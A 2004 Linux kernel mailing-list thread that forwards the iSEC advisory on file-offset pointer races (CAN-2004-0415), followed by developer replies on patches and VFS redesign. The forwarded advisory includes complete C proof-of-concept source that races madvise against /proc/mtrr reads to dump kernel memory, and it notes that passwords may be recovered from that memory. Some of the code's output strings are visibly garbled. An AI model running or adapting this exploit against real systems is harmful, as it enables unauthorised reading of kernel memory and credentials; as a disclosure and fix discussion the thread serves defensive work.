* FW: Linux kernel file offset pointer races
@ 2004-08-05 8:42 Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
2004-08-05 20:34 ` Alan Cox
0 siblings, 2 replies; 13+ messages in thread
From: Giuliano Pochini @ 2004-08-05 8:42 UTC (permalink / raw)
To: linux-kernel
I don't remember if this issue has already been discussed here:
-----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
From: Paul Starzetz <ihaquer@isec.pl>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.netsys.com
Subject: Linux kernel file offset pointer races
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Linux kernel file offset pointer handling
Product: Linux kernel
Version: 2.4 up to to and including 2.4.26, 2.6 up to to and
including 2.6.7
Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE: CAN-2004-0415
Author: Paul Starzetz <ihaquer@isec.pl>
Date: Aug 04, 2004
Issue:
======
A critical security vulnerability has been found in the Linux kernel
code handling 64bit file offset pointers.
Details:
========
The Linux kernel offers a file handling API to the userland
applications. Basically a file can be identified by a file name and
opened through the open(2) system call which in turn returns a file
descriptor for the kernel file object.
One of the properties of the file object is something called 'file
offset' (f_pos member variable of the file object), which is advanced if
one reads or writtes to the file. It can also by changed through the
lseek(2) system call and identifies the current writing/reading position
inside the file image on the media.
There are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have
identified numerous places, where invalid conversions from 64 bit sized
file offsets to 32 bit ones as well as insecure access to the file
offset member variable take place.
We have found that most of the /proc entries (like /proc/version) leak
about one page of unitialized kernel memory and can be exploited to
obtain sensitive data.
We have found dozens of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:
static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
return len;
} /* End Function mtrr_read */
It is quite easy to see that since copy_to_user can sleep, the second
reference to *ppos may use another value. Or in other words, code
operating on the file->f_pos variable through a pointer must be atomic
in respect to the current thread. We expect even more troubles in the
SMP case though.
Exploitation:
=============
In the following we want to concentrate onto the mttr.c code, however we
think that also other f_pos handling code in the kernel may be
exploitable.
The idea is to use the blocking property of copy_to_user to advance the
file->f_pos file offset to be negative allowing us to bypass the two
checks marked with [1] and [2] in the above code.
There are two situation where copy_to_user() will sleep if there is no
page table entry for the corresponding location in the user buffer used
to receive the data:
- - the underlying buffer maps a file which is not in the kernel page
cache yet. The file content must be read from the disk first
- - the mmap_sem semaphore of the process's VM is in a closed state, that
is another thread sharing the same VM caused a down_write on the
semaphore.
We use the second method as follows. One of two threads sharing same VM
issues a madvise(2) call on a VMA that maps some, sufficiently big file
setting the madvise flag to WILLNEED. This will issue a down_write on
the mmap semaphore and schedule a read-ahead request for the mmaped
file.
Second thread issues in the mean time a read on the /proc/mtrr file thus
going for sleep until the first thread returns from the madvise system
call. The two threads will be woken up in a FIFO manner thus the first
thread will run as first and can advance the file pointer of the proc
file to the maximum possible value of 0x7fffffffffffffff while the
second thread is still waiting in the scheduler queue for CPU (itn the
non-SMP case).
After the place marked with [3] has been executed, the file position
will have a negative value and the checks [1] and [2] can be passed for
any buffer length supplied, thus leaking the kernel memory from the
address of ascii_buffer on to the user space.
We have attached a proof-of-concept exploit code to read portions of
kernel memory. Another exploit code we have at our disposal can use
other /proc entries (like /proc/version) to read one page of kernel
memory.
Impact:
=======
Since no special privileges are required to open the /proc/mtrr file for
reading any process may exploit the bug to read huge parts of kernel
memory.
The kernel memory dump may include very sensitive information like
hashed passwords from /etc/shadow or even the root passwort.
We have found in an experiment that after the root user logged in using
ssh (in our case it was OpenSSH using PAM), the root passwort was keept
in kernel memory. This is very suprising since sshd will quickly clean
(overwrite with zeros) the memory portion used to store the password.
But the password may have made its way through various kernel paths like
pipes or sockets.
Tested and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all vulnerable systems as
soon as appropriate vendor patches are released. There is no hotfix for
this vulnerability.
Credits:
========
Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.
Disclaimer:
===========
This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.
Appendix:
=========
/*
*
* /proc ppos kernel memory read (semaphore method)
*
* gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <asm/page.h>
// define machine mem size in MB
#define MEMSIZE 64
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
uint, wh);
void fatal(const char *msg)
{
printf("0);
if(!errno) {
fprintf(stderr, "FATAL ERROR: %s0, msg);
}
else {
perror(msg);
}
printf("0);
fflush(stdout);
fflush(stderr);
exit(31337);
}
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;
// child close sempahore & sleep
int start_child(void *arg)
{
// unlock parent & close semaphore
go[0]=0;
madvise(file, csize, MADV_DONTNEED);
madvise(file, csize, MADV_SEQUENTIAL);
gettimeofday(&tv1, NULL);
read(pfd, buf, 0);
go[0]=1;
r = madvise(file, csize, MADV_WILLNEED);
if(r)
fatal("madvise");
// parent blocked on mmap_sem? GOOD!
if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
if( r == -1 )
fatal("lseek");
printf("0 Race won!"); fflush(stdout);
go[0]=2;
} else {
printf("0 Race lost %d, use another file!0, go[1]);
fflush(stdout);
kill(getppid(), SIGTERM);
}
_exit(1);
return 0;
}
void usage(char *name)
{
printf("0SAGE: %s <file not in cache>", name);
printf("0);
exit(1);
}
int main(int ac, char **av)
{
if(ac<2)
usage(av[0]);
// mmap big file not in cache
r=stat(av[1], &st);
if(r)
fatal("stat file");
csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
fd=open(av[1], O_RDONLY);
if(fd<0)
fatal("open file");
file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
if(file==MAP_FAILED)
fatal("mmap");
close(fd);
printf("0 mmaped uncached file at %p - %p", file, file+csize);
fflush(stdout);
pfd=open("/proc/mtrr", O_RDONLY);
if(pfd<0)
fatal("open");
fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
if(fd<0)
fatal("open data");
r=ftruncate(fd, fsize);
if(r<0)
fatal("ftruncate");
buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if(buf==MAP_FAILED)
fatal("mmap");
close(fd);
printf("0 mmaped kernel data file at %p", buf);
fflush(stdout);
// clone thread wait for child sleep
nc = nice(0);
cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
CLONE_FILES|CLONE_VM, NULL);
nice(19-nc);
while(go[0]==0) {
i++;
}
// try to read & sleep & move fpos to be negative
gettimeofday(&tv1, NULL);
go[1] = 1;
r = read(pfd, buf, size );
go[1] = 2;
gettimeofday(&tv2, NULL);
if(r<0)
fatal("read");
while(go[0]!=2) {
i++;
}
us = tv2.tv_sec - tv1.tv_sec;
us *= 1000000;
us += (tv2.tv_usec - tv1.tv_usec) ;
printf("0 READ %d bytes in %d usec", r, us); fflush(stdout);
r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
if(r < 0 ) {
printf("0 SUCCESS, lseek fails, reading kernel mem...0);
fflush(stdout);
i=0;
for(;;) {
r = read(pfd, buf, PAGE_SIZE );
if(r!=PAGE_SIZE)
break;
buf += PAGE_SIZE;
i++; PAGE %6d", i); fflush(stdout);
printf("
}
printf("0 done, err=%s", strerror(errno) );
fflush(stdout);
}
close(pfd);
printf("0);
sleep(1);
kill(cpid, 9);
return 0;
}
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFBELj2C+8U3Z5wpu4RAgZZAKC8SxT6m4XMoU1koNfFLbf1Vfj32wCgubCT
k2SjwaZ3U2CsOQmcvjRr1IA=
=hIiM
-----END PGP SIGNATURE-----
--------------End of forwarded message-------------------------
--
Giuliano.
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
@ 2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
2004-08-09 8:33 ` Frank Steiner
2004-08-05 20:34 ` Alan Cox
1 sibling, 2 replies; 13+ messages in thread
From: Jirka Kosina @ 2004-08-05 10:30 UTC (permalink / raw)
To: Giuliano Pochini; +Cc: linux-kernel
On Thu, 5 Aug 2004, Giuliano Pochini wrote:
> I don't remember if this issue has already been discussed here:
> -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> From: Paul Starzetz <ihaquer@isec.pl>
> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> full-disclosure@lists.netsys.com
> Subject: Linux kernel file offset pointer races
It hasn't been discussed here, but at
http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
you can find a patchset fixing (some of) the mentioned problems. This
patchset is from 2.4.27-rc5
--
JiKos.
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
@ 2004-08-05 20:34 ` Alan Cox
1 sibling, 0 replies; 13+ messages in thread
From: Alan Cox @ 2004-08-05 20:34 UTC (permalink / raw)
To: Giuliano Pochini; +Cc: Linux Kernel Mailing List
On Iau, 2004-08-05 at 09:42, Giuliano Pochini wrote:
> I don't remember if this issue has already been discussed here:
Its mostly been discussed on vendor-sec so far. Paul was gracious enough
to give everyone time to work on the problem. Al Viro did some original
patches, various folks then moved them to 2.6 and fixed other stuff from
further review.
Andrew has 2.6 draft patches, Marcelo actively worked on the 2.4 ones
(and some 2.6 glitches). If you need 2.6 patches "right now" then one
place to grab them is from the current Fedora 2 kernel.
Alan
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-05 10:30 ` Jirka Kosina
@ 2004-08-07 17:15 ` Marcelo Tosatti
2004-08-11 14:26 ` Andrey Savochkin
2004-08-09 8:33 ` Frank Steiner
1 sibling, 1 reply; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-07 17:15 UTC (permalink / raw)
To: Jirka Kosina; +Cc: Giuliano Pochini, linux-kernel
On Thu, Aug 05, 2004 at 12:30:23PM +0200, Jirka Kosina wrote:
> On Thu, 5 Aug 2004, Giuliano Pochini wrote:
>
> > I don't remember if this issue has already been discussed here:
> > -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> > Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> > From: Paul Starzetz <ihaquer@isec.pl>
> > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> > full-disclosure@lists.netsys.com
> > Subject: Linux kernel file offset pointer races
>
> It hasn't been discussed here, but at
> http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> you can find a patchset fixing (some of) the mentioned problems. This
> patchset is from 2.4.27-rc5
"some of" ?
Do you know any unfixed still broken piece of driver code ?
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
@ 2004-08-09 8:33 ` Frank Steiner
2004-08-09 14:45 ` Alan Cox
1 sibling, 1 reply; 13+ messages in thread
From: Frank Steiner @ 2004-08-09 8:33 UTC (permalink / raw)
To: Jirka Kosina; +Cc: Giuliano Pochini, linux-kernel
Jirka Kosina wrote:
> It hasn't been discussed here, but at
> http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> you can find a patchset fixing (some of) the mentioned problems. This
> patchset is from 2.4.27-rc5
So this is for 2.4. What about 2.6? Distributors like RedHat have patched
their 2.6.7 kernel accordingly, but I haven't found anything similar in
the kernel tree from kernel.org. Do you know if there is any a fix for
the 2.6 tree, too?
cu,
Frank
--
Dipl.-Inform. Frank Steiner Web: http://www.bio.ifi.lmu.de/~steiner/
Lehrstuhl f. Bioinformatik Mail: http://www.bio.ifi.lmu.de/~steiner/m/
LMU, Amalienstr. 17 Phone: +49 89 2180-4049
80333 Muenchen, Germany Fax: +49 89 2180-99-4049
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-09 8:33 ` Frank Steiner
@ 2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
2004-08-10 6:08 ` Frank Steiner
0 siblings, 2 replies; 13+ messages in thread
From: Alan Cox @ 2004-08-09 14:45 UTC (permalink / raw)
To: Frank Steiner; +Cc: Jirka Kosina, Giuliano Pochini, Linux Kernel Mailing List
On Llu, 2004-08-09 at 09:33, Frank Steiner wrote:
> So this is for 2.4. What about 2.6? Distributors like RedHat have patched
> their 2.6.7 kernel accordingly, but I haven't found anything similar in
> the kernel tree from kernel.org. Do you know if there is any a fix for
> the 2.6 tree, too?
If you want a fix now grab the Red Hat or SuSE published fixes. The
final stuff will probably look very different because Linus has
proposed a different solution that makes it harder for new drivers to
make the same mistakes again
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-09 14:45 ` Alan Cox
@ 2004-08-09 16:50 ` Jonathan Corbet
2004-08-09 17:24 ` Linus Torvalds
2004-08-10 6:08 ` Frank Steiner
1 sibling, 1 reply; 13+ messages in thread
From: Jonathan Corbet @ 2004-08-09 16:50 UTC (permalink / raw)
To: Alan Cox; +Cc: linux-kernel, torvalds
> Linus has
> proposed a different solution that makes it harder for new drivers to
> make the same mistakes again
This (along with the bits which have just gone into BK) hints at a
driver API change. Inquiring minds are *very* curious about such things
at the moment... will there be a file_operations method prototype
change associated with the file offset fixes?
Thanks,
jon
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-09 16:50 ` Jonathan Corbet
@ 2004-08-09 17:24 ` Linus Torvalds
0 siblings, 0 replies; 13+ messages in thread
From: Linus Torvalds @ 2004-08-09 17:24 UTC (permalink / raw)
To: Jonathan Corbet; +Cc: Alan Cox, linux-kernel
On Mon, 9 Aug 2004, Jonathan Corbet wrote:
>
> This (along with the bits which have just gone into BK) hints at a
> driver API change. Inquiring minds are *very* curious about such things
> at the moment... will there be a file_operations method prototype
> change associated with the file offset fixes?
No, it's all just building up to the kernel internally always using a
pread/pwrite-like thing to the drivers, and then maintaining f_pos
entirely in the VFS layer. All the VFS interfaces do this already (since
that is how the user-visible pread/pwrite works).
But a few drivers are buggy (they access f_pos directly even if it was a
user-level pread/pwrite), and in particular the /proc sysctl interface was
totally broken this way.
So I've fixed the sysctl code - that _did_ require a prototype change, but
wasn't horribly painful, and am going through drivers..
Linus
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
@ 2004-08-10 6:08 ` Frank Steiner
1 sibling, 0 replies; 13+ messages in thread
From: Frank Steiner @ 2004-08-10 6:08 UTC (permalink / raw)
To: Alan Cox; +Cc: Kernel Mailing List
Alan Cox wrote:
> If you want a fix now grab the Red Hat or SuSE published fixes. The
> final stuff will probably look very different because Linus has
> proposed a different solution that makes it harder for new drivers to
> make the same mistakes again
Thank you very much for clarifying this!
cu,
Frank
--
Dipl.-Inform. Frank Steiner Web: http://www.bio.ifi.lmu.de/~steiner/
Lehrstuhl f. Bioinformatik Mail: http://www.bio.ifi.lmu.de/~steiner/m/
LMU, Amalienstr. 17 Phone: +49 89 2180-4049
80333 Muenchen, Germany Fax: +49 89 2180-99-4049
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-07 17:15 ` Marcelo Tosatti
@ 2004-08-11 14:26 ` Andrey Savochkin
2004-08-11 21:14 ` Marcelo Tosatti
0 siblings, 1 reply; 13+ messages in thread
From: Andrey Savochkin @ 2004-08-11 14:26 UTC (permalink / raw)
To: Marcelo Tosatti; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
The file position is protected by the BKL in llseek(), but I do not see any
serialization neither in sys_read() nor in generic_file_read() and other
methods.
Have we accepted that the file position may be corrupted after crossing 2^32
boundary by 2 processes reading in parallel from the same file?
Or am I missing something?
Andrey
On Sat, Aug 07, 2004 at 02:15:00PM -0300, Marcelo Tosatti wrote:
> On Thu, Aug 05, 2004 at 12:30:23PM +0200, Jirka Kosina wrote:
> > On Thu, 5 Aug 2004, Giuliano Pochini wrote:
> >
> > > I don't remember if this issue has already been discussed here:
> > > -----FW: <Pine.LNX.4.44.0408041220550.26961-100000@isec.pl>-----
> > > Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
> > > From: Paul Starzetz <ihaquer@isec.pl>
> > > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> > > full-disclosure@lists.netsys.com
> > > Subject: Linux kernel file offset pointer races
> >
> > It hasn't been discussed here, but at
> > http://linux.bkbits.net:8080/linux-2.4/gnupatch@411064f7uz3rKDb73dEb4vCqbjEIdw
> > you can find a patchset fixing (some of) the mentioned problems. This
> > patchset is from 2.4.27-rc5
>
> "some of" ?
>
> Do you know any unfixed still broken piece of driver code ?
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-11 14:26 ` Andrey Savochkin
@ 2004-08-11 21:14 ` Marcelo Tosatti
2004-08-12 7:55 ` Andrey Savochkin
0 siblings, 1 reply; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-11 21:14 UTC (permalink / raw)
To: Andrey Savochkin; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> The file position is protected by the BKL in llseek(), but I do not see any
> serialization neither in sys_read() nor in generic_file_read() and other
> methods.
>
> Have we accepted that the file position may be corrupted after crossing 2^32
> boundary by 2 processes reading in parallel from the same file?
> Or am I missing something?
Yes, as far as I know, parallel users of the same file descriptions (which
can race on 64-bit architectures) is expected, we dont care about handling it.
Behaviour is undefined.
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-11 21:14 ` Marcelo Tosatti
@ 2004-08-12 7:55 ` Andrey Savochkin
2004-08-12 13:53 ` Marcelo Tosatti
0 siblings, 1 reply; 13+ messages in thread
From: Andrey Savochkin @ 2004-08-12 7:55 UTC (permalink / raw)
To: Marcelo Tosatti; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
On Wed, Aug 11, 2004 at 06:14:30PM -0300, Marcelo Tosatti wrote:
> On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> > BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> > The file position is protected by the BKL in llseek(), but I do not see any
> > serialization neither in sys_read() nor in generic_file_read() and other
> > methods.
> >
> > Have we accepted that the file position may be corrupted after crossing 2^32
> > boundary by 2 processes reading in parallel from the same file?
> > Or am I missing something?
>
> Yes, as far as I know, parallel users of the same file descriptions (which
> can race on 64-bit architectures) is expected, we dont care about handling it.
>
> Behaviour is undefined.
I prefer explainable behaviours :)
If 2 processes start reading at offset 0xfffffffe, and one of them reads 1
byte and the second 2 bytes, I can expect the file position be 0xffffffff,
0x100000000, 0x100000001, or, in the worst case, 0xfffffffe again.
But 0x1ffffffff will be a real surprise.
For a bigger surprise, we can kill one of the processes with SIGFPE if we
find that the processes perform such an "incorrect" parallel read and the
file position has changed behind us ;)
But we don't want that much undefined behaviour, do we? :)
Best regards
Andrey
^ permalink raw reply [flat|nested] 13+ messages in thread
* Re: FW: Linux kernel file offset pointer races
2004-08-12 7:55 ` Andrey Savochkin
@ 2004-08-12 13:53 ` Marcelo Tosatti
0 siblings, 0 replies; 13+ messages in thread
From: Marcelo Tosatti @ 2004-08-12 13:53 UTC (permalink / raw)
To: Andrey Savochkin; +Cc: Jirka Kosina, Giuliano Pochini, linux-kernel
Hi Andrey,
On Thu, Aug 12, 2004 at 11:55:31AM +0400, Andrey Savochkin wrote:
> On Wed, Aug 11, 2004 at 06:14:30PM -0300, Marcelo Tosatti wrote:
> > On Wed, Aug 11, 2004 at 06:26:02PM +0400, Andrey Savochkin wrote:
> > > BTW, f_pos assignments are non-atomic on IA-32 since it's a 64-bit value.
> > > The file position is protected by the BKL in llseek(), but I do not see any
> > > serialization neither in sys_read() nor in generic_file_read() and other
> > > methods.
> > >
> > > Have we accepted that the file position may be corrupted after crossing 2^32
> > > boundary by 2 processes reading in parallel from the same file?
> > > Or am I missing something?
> >
> > Yes, as far as I know, parallel users of the same file descriptions (which
> > can race on 64-bit architectures) is expected, we dont care about handling it.
> >
> > Behaviour is undefined.
>
> I prefer explainable behaviours :)
Do the locking in the concurrent userspace pos users, then :)
> If 2 processes start reading at offset 0xfffffffe, and one of them reads 1
> byte and the second 2 bytes, I can expect the file position be 0xffffffff,
> 0x100000000, 0x100000001, or, in the worst case, 0xfffffffe again.
> But 0x1ffffffff will be a real surprise.
>
> For a bigger surprise, we can kill one of the processes with SIGFPE if we
> find that the processes perform such an "incorrect" parallel read and the
> file position has changed behind us ;)
> But we don't want that much undefined behaviour, do we? :)
quoting viro:
"FWIW, anybody who mixes read() and lseek() on the same descriptor without
logics in their code serializing those are also getting what they'd asked
for - GIGO. It should not break the kernel, obviously, but kernel has no
business being nice to inherently racy userland code. BTW, you do realize
that lseek() in the middle of read() on the same descriptor will be lost?
On regular files, on quite a few Unices, Linux included."
We dont guarantee serialization of a file's descriptor
(I mistyped "file description" in the last email) f_pos.
Thats up to the user application.
Makes sense to me.
^ permalink raw reply [flat|nested] 13+ messages in thread
end of thread, other threads:[~2004-08-12 15:06 UTC | newest]
Thread overview: 13+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
2004-08-11 14:26 ` Andrey Savochkin
2004-08-11 21:14 ` Marcelo Tosatti
2004-08-12 7:55 ` Andrey Savochkin
2004-08-12 13:53 ` Marcelo Tosatti
2004-08-09 8:33 ` Frank Steiner
2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
2004-08-09 17:24 ` Linus Torvalds
2004-08-10 6:08 ` Frank Steiner
2004-08-05 20:34 ` Alan Cox
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox